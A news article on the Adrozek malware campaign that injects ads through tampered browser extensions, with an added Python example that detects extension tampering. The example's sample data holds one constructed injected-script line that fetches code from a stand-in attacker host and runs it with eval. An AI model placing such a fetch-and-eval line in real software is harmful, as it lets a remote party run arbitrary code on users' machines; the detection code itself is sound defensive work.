The malware gets installed just like other programmes, can be accessed through Apps settings, and registers itself as a Windows service with the same name, lowering the chances of it being caught by anti-virus software.
Malware identified as ‘Adrozek’ has been targeting 30,000 devices every day since May this year.
The most popular browsers, including Google Chrome, Microsoft Edge, Firefox and Yandex, have become home to a new malware campaign that targets users' browsers to inject malicious browser extensions and ads into their search results. According to a Microsoft blog post, the malware identified as ‘Adrozek’ has been targeting 30,000 devices every day since May this year, and attacks peaked in August 2020.
Microsoft researcher teams have already tracked 159 unique domains that were hosting on average 17,300 unique domains, which in turn launched on average 15,300 distinct malware samples. According to Microsoft, the aim of the campaign is to make vulnerable users visit affiliated pages by serving malware-injected ads in search results. To do that, the malware first changes the browser settings and adds extensions to insert illegitimate ads on top of the actual ads from the search engine. The malware can also take over security control features in MsEdge.dll on Microsoft Edge.
Adrozek gets installed just like other programmes, can be accessed through Apps settings, and registers itself as a Windows service with the same name, lowering the chances of it being caught by the anti-virus software in use on the system. Once installed, it modifies a typical Google Chrome Media Router extension. For other browsers like Yandex and Microsoft Edge, it finds its host in legitimate browser extensions.
The malware campaign further adds the same malicious script to all the browser extensions, helping attackers establish a connection from the device and fetch additional scripts with which they inject illegitimate ads into search results. The malware also changes system settings to gain additional control and to prevent the browser from updating itself. “In the past, browser modifiers calculated the hashes like browsers do and update the Secure Preferences accordingly. Adrozek goes one step further and patches the function that launches the integrity check,” the Microsoft blog post said.
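Because Adrozek patches the browser's own integrity check instead of keeping the Secure Preferences hashes consistent, the browser will not complain about the tampered extensions. A defender can instead verify the extension files independently: compare each file against a known-good baseline, and look for one identical script that has appeared inside several unrelated extensions, which is exactly the footprint the paragraph above describes. The following Python is an added illustration, not code from the article or from Microsoft; it runs over a small constructed in-memory snapshot (extension ids `ext_a`/`ext_b` and their file contents are made up) rather than walking a real browser profile directory.

```python
"""Defender-side checks for browser-extension tampering of the kind described above.

Two heuristics over a snapshot of extension files ("<extension_id>/<relative path>" -> bytes):
1. files whose SHA-256 no longer matches a known-good baseline (or that did not exist before), and
2. a single file whose exact content appears inside several distinct extensions, the signature
   of a modifier that injects the same payload into every extension it finds.
"""
import hashlib
from collections import defaultdict


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(snapshot: dict) -> dict:
    """Record the hash of every extension file in a trusted snapshot."""
    return {path: sha256(content) for path, content in snapshot.items()}


def tampered_files(baseline: dict, snapshot: dict) -> list:
    """Paths whose current hash differs from the baseline, plus paths absent from it."""
    flagged = []
    for path, content in snapshot.items():
        if baseline.get(path) != sha256(content):
            flagged.append(path)
    return sorted(flagged)


def shared_scripts(snapshot: dict, min_extensions: int = 2) -> dict:
    """Map content hash -> sorted extension ids for any file found byte-identical
    in at least `min_extensions` distinct extensions."""
    extensions_by_hash = defaultdict(set)
    for path, content in snapshot.items():
        ext_id = path.split("/", 1)[0]
        extensions_by_hash[sha256(content)].add(ext_id)
    return {h: sorted(ids) for h, ids in extensions_by_hash.items() if len(ids) >= min_extensions}


# Constructed sample: two legitimate extensions before and after a modifier injects its script.
CLEAN_SNAPSHOT = {
    "ext_a/manifest.json": b'{"name": "Media Router", "version": "1.0"}',
    "ext_a/background.js": b"chrome.runtime.onInstalled.addListener(() => {});",
    "ext_b/manifest.json": b'{"name": "Reader View", "version": "2.3"}',
    "ext_b/content.js": b"document.body.dataset.reader = '1';",
}
INJECTED = b"fetch('https://attacker.invalid/ads.js').then(r => r.text()).then(eval);"  # constructed payload
TAMPERED_SNAPSHOT = dict(CLEAN_SNAPSHOT)
TAMPERED_SNAPSHOT["ext_a/background.js"] = CLEAN_SNAPSHOT["ext_a/background.js"] + b"\nimportScripts('injected.js');"
TAMPERED_SNAPSHOT["ext_a/injected.js"] = INJECTED
TAMPERED_SNAPSHOT["ext_b/injected.js"] = INJECTED

BASELINE = build_baseline(CLEAN_SNAPSHOT)


def audit(baseline: dict = BASELINE, snapshot: dict = TAMPERED_SNAPSHOT) -> dict:
    """Run both checks and return the findings as plain data for logging or alerting."""
    return {
        "tampered": tampered_files(baseline, snapshot),
        "shared": shared_scripts(snapshot),
    }


if __name__ == "__main__":
    for key, value in audit().items():
        print(key, value)
```

In a real deployment the baseline would be captured at install time (or derived from the extension's store package) and the snapshot taken from the profile's extension directory; the shared-script check is useful on its own when no baseline exists, since a byte-identical file across unrelated extensions is rare in legitimate installs.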
The Adrozek attacks are mostly happening on systems in Europe, South East Asia and South Asia, and the campaign could extend to other geographies as well. To stop a system from falling prey to the malware, Microsoft researchers suggested an anti-virus programme like Microsoft Defender Antivirus, which has a built-in behaviour-based, machine learning-powered mechanism to detect malware families like Adrozek that only target systems running Windows. Machines running macOS and Linux, however, are not affected by this malware.
Earlier this year, Microsoft and Google detected a set of extensions that were illegitimately inserting ads into search engine results and restricted them on their web stores. Microsoft, however, will need a tougher approach to deal with new kinds of malware threats like Adrozek.